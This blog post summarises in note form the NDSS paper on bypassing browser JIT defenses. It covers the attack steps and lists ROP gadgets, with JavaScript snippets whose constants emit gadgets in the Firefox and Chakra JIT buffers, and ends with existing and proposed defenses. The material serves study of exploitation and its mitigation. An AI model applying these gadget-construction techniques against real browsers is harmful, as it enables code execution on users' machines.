<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>

























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.7.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="做个摘记 原文连接 The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines">
<meta name="keywords" content="JIT">
<meta property="og:type" content="article">
<meta property="og:title" content="Bypassing Defenses in Browser JIT Engines 摘记">
<meta property="og:url" content="https://vsane.github.io/2019/01/30/jitdefensebypass/index.html">
<meta property="og:site_name" content="V4kst1z&#39;s Blog">
<meta property="og:description" content="做个摘记 原文连接 The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-01-30T05:40:51.183Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Bypassing Defenses in Browser JIT Engines 摘记">
<meta name="twitter:description" content="做个摘记 原文连接 The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines">



  <link rel="alternate" href="/atom.xml" title="V4kst1z's Blog" type="application/atom+xml">




  <link rel="canonical" href="https://vsane.github.io/2019/01/30/jitdefensebypass/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Bypassing Defenses in Browser JIT Engines 摘记 | V4kst1z's Blog</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">V4kst1z's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tag"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://vsane.github.io/2019/01/30/jitdefensebypass/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="V4kst1z">
      <meta itemprop="description" content="Bin Dog">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="V4kst1z's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Bypassing Defenses in Browser JIT Engines 摘记

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-01-30 13:30:07 / Modified: 13:40:51" itemprop="dateCreated datePublished" datetime="2019-01-30T13:30:07+08:00">2019-01-30</time>
            

            
              

              
            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/01/30/jitdefensebypass/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2019/01/30/jitdefensebypass/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             Views:  
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>做个摘记 原文连接 <a href="https://www3.cs.stonybrook.edu/~mikepo/papers/devil.ndss15.pdf" target="_blank" rel="noopener">The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines</a></p>
<a id="more"></a>
<hr>
<h2 id="I-INTRODUCTION"><a href="#I-INTRODUCTION" class="headerlink" title="I. INTRODUCTION"></a>I. INTRODUCTION</h2><h3 id="A-Problem-Statement"><a href="#A-Problem-Statement" class="headerlink" title="A. Problem Statement"></a>A. Problem Statement</h3><blockquote>
<ul>
<li>Modern operating systems (OSs) include features like stack canaries, non-executable pages, and address-space layout randomization (ASLR) , which severely hinder exploitation.</li>
<li>Code-reuse techniques such as return-oriented programming  require information-leak bugs to reveal the randomized location of code</li>
<li>Control-flow integrity (CFI) fine-grained code randomization, and run-time behavioral monitoring  promise to protect software from ROP-like attacks </li>
<li>Fine-grained CFI and G-Free, offer greater guarantees again control-flow hijacking attacks and ROP.</li>
</ul>
</blockquote>
<p>Modern browsers dynamically generate code through just-in-time (JIT) compilation to accelerate the execution of JavaScript (JS) code at run time.</p>
<p>Code and data were not separated by the code-generation engine, so both the generated native code<br>and the data it was operating on was placed on the same executable memory pages. It was enough for the attacker to place shellcode in a JavaScript array and then redirect the program’s control-flow to his shellcode in memory. Because ASLR was already in place, attackers created many copies of the data array, which resulted in one of the JIT buffers being allocated in a relatively predictable memory location, where they could transfer control. This technique is commonly referred to as JIT spraying.</p>
<p>Two simple strategies avoid JIT spraying:</p>
<blockquote>
<ul>
<li>Placing data in nonexecutable memory pages</li>
<li>The amount of memory dedicated to generated code is limited (i.e., the JIT buffer is finite) to prevent the placement of buffers at predictable offsets</li>
</ul>
</blockquote>
<p>Bypass</p>
<blockquote>
<p>Using four or eight byte constants within JavaScript code, which are emitted as immediates in<br>the generated code. The attacker can carefully select these constants to build small instruction segments, called gadgets, and link them in ROP fashion.</p>
</blockquote>
<h3 id="B-Our-Approach"><a href="#B-Our-Approach" class="headerlink" title="B. Our Approach"></a>B. Our Approach</h3><p> It is possible to introduce new gadgets within the browsers, and we can use these gadgets to construct useful payloads without using any gadgets from the browsers and their libraries. </p>
<h2 id="II-BACKGROUND"><a href="#II-BACKGROUND" class="headerlink" title="II. BACKGROUND"></a>II. BACKGROUND</h2><h3 id="A-ROP-Gadgets"><a href="#A-ROP-Gadgets" class="headerlink" title="A. ROP Gadgets"></a>A. ROP Gadgets</h3><p>Code-reuse</p>
<h3 id="B-JIT-Compilation"><a href="#B-JIT-Compilation" class="headerlink" title="B. JIT Compilation"></a>B. JIT Compilation</h3><p>Compiling does not happen ahead of time, like it happens when programs are compiled, but just-in-time (JIT), exactly when the JavaScript interpreter decides that a particular part of code will be executed repeatedly. The program that compiles a part of JavaScript into native code is called a JIT compiler</p>
<h2 id="III-THREAT-MODEL"><a href="#III-THREAT-MODEL" class="headerlink" title="III. THREAT MODEL"></a>III. THREAT MODEL</h2><h3 id="A-Active-Defenses"><a href="#A-Active-Defenses" class="headerlink" title="A. Active Defenses"></a>A. Active Defenses</h3><p>DEP, ASLR, Stack Canaries, EMET, gadget-free, Browser-specific defenses against code-reuse attacks using the code generated by the JIT compiler are also active.</p>
<h3 id="B-Attacker-Capabilities"><a href="#B-Attacker-Capabilities" class="headerlink" title="B. Attacker Capabilities"></a>B. Attacker Capabilities</h3><h3 id="C-Is-this-attack-unstoppable"><a href="#C-Is-this-attack-unstoppable" class="headerlink" title="C. Is this attack unstoppable?"></a>C. Is this attack unstoppable?</h3><h2 id="IV-EXPLOITING-MOZILLA-FIREFOX"><a href="#IV-EXPLOITING-MOZILLA-FIREFOX" class="headerlink" title="IV. EXPLOITING MOZILLA FIREFOX"></a>IV. EXPLOITING MOZILLA FIREFOX</h2><p>The steps required to launch this attack are:</p>
<blockquote>
<ul>
<li>The browser renders a malicious web page.</li>
<li>JavaScript contained in this page, once compiled, produces a series of gadgets in the JIT buffer.</li>
<li>A memory-disclosure bug reveals the locations of the<br>gadgets [9].</li>
<li>A ROP chain is built with the just constructed gadgets<br>and control is transferred to it.</li>
<li>The ROP chain calls VirtualProtect (or<br>mprotect, depending on the platform) for making a<br>data page (where the shellcode is stored) executable.</li>
<li>Control is transferred to the shellcode and the browser<br>is compromised.</li>
</ul>
</blockquote>
<h3 id="A-Preparation"><a href="#A-Preparation" class="headerlink" title="A. Preparation"></a>A. Preparation</h3><p>Loading a register with the required value can be done in two ways. The first is to place the desired value on the stack and use pop with the register name, and the second is to use a mov-like command to copy the value to the register.<br>Required gadgets for calling mprotect in Linux (32-bit)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pop %ebx ; ret ;</span><br><span class="line">pop %ecx ; ret ;</span><br><span class="line">xor %eax , %eax ; ret ;</span><br><span class="line">mov 0x7d , %al ; ret ;</span><br><span class="line">xor %edx , %edx ; ret ;</span><br><span class="line">mov 0x7 , %dl ; ret ;</span><br><span class="line">int 0x80 ; ret ;</span><br></pre></td></tr></table></figure></p>
<p>The JavaScript program which once compiled will produce the needed gadgets in the JIT buffer.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">var g1 = 0 ;</span><br><span class="line"></span><br><span class="line">var g7 = 0 ;</span><br><span class="line"></span><br><span class="line">for(var i = 0; i &lt;100000; ++ i ) &#123;</span><br><span class="line">	g1 = 50011; \\ pop ebx ; ret ;</span><br><span class="line">	g2 = 50009; \\ pop ecx ; ret ;</span><br><span class="line">	g3 = 12828721; \\ xor eax , eax ; ret ;</span><br><span class="line">	g4 = 12811696; \\ mov 0x7d , al ; ret ;</span><br><span class="line">	g5 = 12833329; \\ xor edx , edx ; ret ;</span><br><span class="line">	g6 = 12781490; \\ mov 0x7 , dl ; ret ;</span><br><span class="line">	g7 = 12812493; \\ int 0x80 ; ret ;</span><br></pre></td></tr></table></figure></p>
<h3 id="B-Exploit-Implementation"><a href="#B-Exploit-Implementation" class="headerlink" title="B. Exploit Implementation"></a>B. Exploit Implementation</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">movl $0xc3c031 , 0 x6c8 (%eax ) -&gt; 0x06c8080c7c3c03100</span><br><span class="line">0xc3c031 -&gt; xor %eax , %eax ; ret;</span><br></pre></td></tr></table></figure>
<h2 id="V-EXPLOITING-INTERNET-EXPLORER"><a href="#V-EXPLOITING-INTERNET-EXPLORER" class="headerlink" title="V. EXPLOITING INTERNET EXPLORER"></a>V. EXPLOITING INTERNET EXPLORER</h2><p>Required gadgets for calling VirtualProtect in Windows (64-bit).<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pop %r8 ; ret;</span><br><span class="line">pop %r9 ; ret;</span><br><span class="line">pop %rcx ; ret;</span><br><span class="line">pop %rdx ; ret;</span><br><span class="line">pop %rax ; ret;</span><br></pre></td></tr></table></figure></p>
<h3 id="A-Why-Internet-Explorer-is-different"><a href="#A-Why-Internet-Explorer-is-different" class="headerlink" title="A. Why Internet Explorer is different"></a>A. Why Internet Explorer is different</h3><p>A series of defenses specifically introduced for preventing the generation of gadgets in the JIT buffer</p>
<h3 id="B-Preparation"><a href="#B-Preparation" class="headerlink" title="B. Preparation"></a>B. Preparation</h3><p>constructing the stack-pivoting gadget</p>
<h3 id="C-Exploit-Design-Considerations"><a href="#C-Exploit-Design-Considerations" class="headerlink" title="C. Exploit Design Considerations"></a>C. Exploit Design Considerations</h3><blockquote>
<ul>
<li>Constant Blinding: Any immediate value longer than 2 bytes long is never emitted as is in the JIT buffer. Instead, it is XORed with a random value and then XORed again when it is actually used. </li>
</ul>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">var gadget = 0 xc35841;</span><br><span class="line"></span><br><span class="line">mov %rcx, 1000000c35841h</span><br><span class="line">mov qword ptr [rax+48h] , %rcx</span><br><span class="line">      </span><br><span class="line">Chakra</span><br><span class="line">mov %rcx , 3BF43B1820E7ED7Dh</span><br><span class="line">mov %rdx , 3BF53B182024B53Ch</span><br><span class="line">xor %rcx , %rdx</span><br><span class="line">mov qword ptr [%rax+48h] , %rcx</span><br></pre></td></tr></table></figure>
<blockquote>
<ul>
<li>Long Gadgets: Since gadgets longer than 2 bytes cannot be encapsulated in immediate values, the gadget must be broken into two parts: the pop part which loads the register with the desired value and the ret part (1 byte).</li>
</ul>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function f(addr) &#123;</span><br><span class="line">    return addr + 0x5841 ;</span><br><span class="line">&#125;</span><br><span class="line">f(0) ;</span><br><span class="line"></span><br><span class="line">add %eax , 5841h has been replaced with pop %r8 add byte [%rax] , %al</span><br></pre></td></tr></table></figure>
<p>The important part is that Chakra has placed a conditional jump which is followed if the overflow bit is set:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jo 0x00051fd6c0037</span><br></pre></td></tr></table></figure></p>
<p>Notice, that the addition following the pop instruction sets the overflow bit and thus the flow follows the conditional jump which executes an access violation handler</p>
<blockquote>
<ul>
<li>Code Diversification: Chakra adds another diversification layer in the JIT buffer by emitting a random number of nop instructions.</li>
</ul>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">function r8(addr) &#123;</span><br><span class="line">	return addr + 0x5841;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function r9(addr)&#123;</span><br><span class="line">return addr + 0x5941;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function emitgadgets( ) &#123;</span><br><span class="line">	for(i = 0 ; i &lt; 0xc35841 ; i++ ) &#123;</span><br><span class="line">		rax = 0xc358 ;</span><br><span class="line">		rcx = 0xc359 ;</span><br><span class="line">		rdx = 0xc35a ;</span><br><span class="line">		r8(0) ;</span><br><span class="line">		r9(0) ;</span><br><span class="line">	&#125;</span><br><span class="line">	return 0 ;</span><br><span class="line">&#125;</span><br><span class="line">emitgadgets() ;</span><br></pre></td></tr></table></figure>
<h2 id="VI-DISCOVERING-THE-GADGETS"><a href="#VI-DISCOVERING-THE-GADGETS" class="headerlink" title="VI. DISCOVERING THE GADGETS"></a>VI. DISCOVERING THE GADGETS</h2><h3 id="A-How-Information-Leaks-Work"><a href="#A-How-Information-Leaks-Work" class="headerlink" title="A. How Information Leaks Work"></a>A. How Information Leaks Work</h3><h3 id="B-Leaking-the-JIT-Buffer"><a href="#B-Leaking-the-JIT-Buffer" class="headerlink" title="B. Leaking the JIT Buffer"></a>B. Leaking the JIT Buffer</h3><h2 id="VII-DEFENSES"><a href="#VII-DEFENSES" class="headerlink" title="VII. DEFENSES"></a>VII. DEFENSES</h2><h3 id="A-Existing-Defenses"><a href="#A-Existing-Defenses" class="headerlink" title="A. Existing Defenses"></a>A. Existing Defenses</h3><ul>
<li style="list-style: none"><input type="checkbox" checked> preventing the construction of gadgets using techniques such as constant blinding </li>
<li style="list-style: none"><input type="checkbox" checked> diversifying the JIT buffer so that the created gadgets cannot be located.</li>
</ul>
<h3 id="B-Proposed-Defenses"><a href="#B-Proposed-Defenses" class="headerlink" title="B. Proposed Defenses"></a>B. Proposed Defenses</h3><p>JIT Analysis: The most obvious defense mechanism is to enhance the JIT compiler with the techniques proposed by G-Free for eliminating all gadgets. This has as a major advantage that the produced code is safe and gadget-free,however this does not come for free.<br>JavaScript Analysis: As we can observe from the JavaScript payloads used for attacking Mozilla Firefox and IE special patterns, such as constant values that can be interpreted as x86 opcodes, are utilized. Therefore, source analysis could infer if a JavaScript program is targeting the JIT engine. However, modern obfuscation techniques can make such analysis hard.</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/JIT/" rel="tag"><i class="fa fa-tag"></i> JIT</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/25/qwn2own/" rel="next" title="BKP CTF qwn2own">
                <i class="fa fa-chevron-left"></i> BKP CTF qwn2own
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/02/v8note/" rel="prev" title="V8 笔记 - Data Types And Properties">
                V8 笔记 - Data Types And Properties <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="V4kst1z">
            
              <p class="site-author-name" itemprop="name">V4kst1z</p>
              <p class="site-description motion-element" itemprop="description">Bin Dog</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/Vsane" title="GitHub &rarr; https://github.com/Vsane" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://twitter.com/v4kst1z" title="Twitter &rarr; https://twitter.com/v4kst1z" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/qq_29343201" title="https://blog.csdn.net/qq_29343201" rel="noopener" target="_blank">Anciety</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aryb1n.github.io/" title="https://aryb1n.github.io/" rel="noopener" target="_blank">Aryb1n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://dwfault-blog.imwork.net:30916/" title="http://dwfault-blog.imwork.net:30916/" rel="noopener" target="_blank">dwfault</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://52yuluo.top/" title="http://52yuluo.top/" rel="noopener" target="_blank">Yuluo</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#I-INTRODUCTION"><span class="nav-number">1.</span> <span class="nav-text">I. INTRODUCTION</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-Problem-Statement"><span class="nav-number">1.1.</span> <span class="nav-text">A. Problem Statement</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-Our-Approach"><span class="nav-number">1.2.</span> <span class="nav-text">B. Our Approach</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#II-BACKGROUND"><span class="nav-number">2.</span> <span class="nav-text">II. BACKGROUND</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-ROP-Gadgets"><span class="nav-number">2.1.</span> <span class="nav-text">A. ROP Gadgets</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-JIT-Compilation"><span class="nav-number">2.2.</span> <span class="nav-text">B. JIT Compilation</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#III-THREAT-MODEL"><span class="nav-number">3.</span> <span class="nav-text">III. THREAT MODEL</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-Active-Defenses"><span class="nav-number">3.1.</span> <span class="nav-text">A. Active Defenses</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-Attacker-Capabilities"><span class="nav-number">3.2.</span> <span class="nav-text">B. Attacker Capabilities</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#C-Is-this-attack-unstoppable"><span class="nav-number">3.3.</span> <span class="nav-text">C. Is this attack unstoppable?</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#IV-EXPLOITING-MOZILLA-FIREFOX"><span class="nav-number">4.</span> <span class="nav-text">IV. EXPLOITING MOZILLA FIREFOX</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-Preparation"><span class="nav-number">4.1.</span> <span class="nav-text">A. Preparation</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-Exploit-Implementation"><span class="nav-number">4.2.</span> <span class="nav-text">B. Exploit Implementation</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#V-EXPLOITING-INTERNET-EXPLORER"><span class="nav-number">5.</span> <span class="nav-text">V. EXPLOITING INTERNET EXPLORER</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-Why-Internet-Explorer-is-different"><span class="nav-number">5.1.</span> <span class="nav-text">A. Why Internet Explorer is different</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-Preparation"><span class="nav-number">5.2.</span> <span class="nav-text">B. Preparation</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#C-Exploit-Design-Considerations"><span class="nav-number">5.3.</span> <span class="nav-text">C. Exploit Design Considerations</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#VI-DISCOVERING-THE-GADGETS"><span class="nav-number">6.</span> <span class="nav-text">VI. DISCOVERING THE GADGETS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-How-Information-Leaks-Work"><span class="nav-number">6.1.</span> <span class="nav-text">A. How Information Leaks Work</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-Leaking-the-JIT-Buffer"><span class="nav-number">6.2.</span> <span class="nav-text">B. Leaking the JIT Buffer</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#VII-DEFENSES"><span class="nav-number">7.</span> <span class="nav-text">VII. DEFENSES</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-Existing-Defenses"><span class="nav-number">7.1.</span> <span class="nav-text">A. Existing Defenses</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-Proposed-Defenses"><span class="nav-number">7.2.</span> <span class="nav-text">B. Proposed Defenses</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">V4kst1z</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v6.7.0</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="Total Visitors">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="Total Views">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
